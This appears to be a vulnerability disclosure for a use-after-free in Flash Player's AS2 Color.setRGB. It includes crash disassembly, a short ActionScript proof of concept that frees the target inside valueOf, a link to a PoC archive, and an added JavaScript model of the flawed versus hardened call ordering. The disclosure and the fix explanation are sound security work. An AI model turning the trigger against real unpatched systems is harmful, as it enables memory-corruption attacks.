Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference to it remains on the stack.
VERSION
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1
REPRODUCTION CASE
The Color constructor needs a target_mc object such as a MovieClip, a TextField, etc. When Color.setRGB is called with a custom object, arbitrary AS2 code runs while the argument is converted to a number, and that code can delete the target_mc object, leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004B82D0 push esi
.text:004B82D1 mov esi, [esp+4+arg_0]
.text:004B82D5 push edi
.text:004B82D6 mov edi, ecx
.text:004B82D8 mov ecx, [edi+94h] ; edi points to freed memory
.text:004B82DE and ecx, 0FFFFFFFEh
.text:004B82E1 add ecx, 3Ch
.text:004B82E4 mov eax, esi
.text:004B82E6 call sub_4B0724 ; crash below
...
.text:004B0724 mov edx, [ecx] ; crash here ecx = 3ch (null pointer)
.text:004B0726 cmp edx, [eax]
.text:004B0728 jnz short loc_4B077E
Compile the PoC with Flash CS5.5.
***************************************************************************
Content of as2_color_uaf.fla:
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
    tf.removeTextField()   // frees the target_mc while setRGB still holds a reference to it
    return 0x41414142
}
var c = new Color(tf)
c.setRGB(o)                // converting o to a number invokes o.valueOf above
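Added example, not part of the original report and not Flash Player code: a JavaScript model of the ordering problem the report describes. TextFieldModel, its removed flag, nativeSetColor and the two Color classes are constructed stand-ins for the native target_mc pointer and the setRGB implementation; replay() mirrors the as2_color_uaf.fla reproduction case. The point it shows is the fix pattern: coerce script-controlled arguments to plain values before touching the target, and re-validate the target afterwards, because the coercion can run arbitrary script.

```javascript
// Constructed model of "callback during argument coercion invalidates the target".
// Nothing here is Flash Player code; the names are assumptions for illustration.

class TextFieldModel {
  constructor(name) { this.name = name; this.removed = false; this.rgb = 0; }
  // Stands in for removeTextField(): after this the native object would be freed.
  removeTextField() { this.removed = true; }
}

// Models dereferencing the native target pointer. Touching a removed object is the
// use-after-free; the model fails loudly instead of reading freed memory.
function nativeSetColor(target, rgb) {
  if (target.removed) {
    throw new Error("use of freed target: " + target.name);
  }
  target.rgb = rgb;
}

// Vulnerable ordering: grab the target, then coerce the argument. Number(value)
// calls value.valueOf(), which may run script that removes the target.
class ColorVulnerable {
  constructor(target) { this.target = target; }
  setRGB(value) {
    const t = this.target;          // raw reference held across the callback
    const rgb = Number(value) | 0;  // script runs here
    nativeSetColor(t, rgb);         // t may already be gone
    return true;
  }
}

// Hardened ordering: coerce first so every script-visible side effect has already
// happened, then re-check the target before dereferencing it.
class ColorHardened {
  constructor(target) { this.target = target; }
  setRGB(value) {
    const rgb = Number(value) | 0;  // script runs here, before any native access
    const t = this.target;
    if (t.removed) {
      return false;                 // fail closed: the target no longer exists
    }
    nativeSetColor(t, rgb);
    return true;
  }
}

// Replays the reproduction case against either class: an argument whose valueOf
// removes the target while it is being converted to a number.
function replay(ColorClass) {
  const tf = new TextFieldModel("tf");
  const color = new ColorClass(tf);
  const o = {
    valueOf() {
      tf.removeTextField();
      return 0x41414142;
    },
  };
  try {
    const ok = color.setRGB(o);
    return { outcome: ok ? "applied" : "rejected", rgb: tf.rgb };
  } catch (e) {
    return { outcome: "crash", error: e.message };
  }
}

console.log("vulnerable ordering:", replay(ColorVulnerable));
console.log("hardened ordering:  ", replay(ColorHardened));
```

The model replaces the native crash with a thrown Error so the difference between the two orderings is observable; in the real engine the equivalent fix is to finish all script-visible conversions, then hold a strong reference to (or re-look-up) the target before the native code touches it.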
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip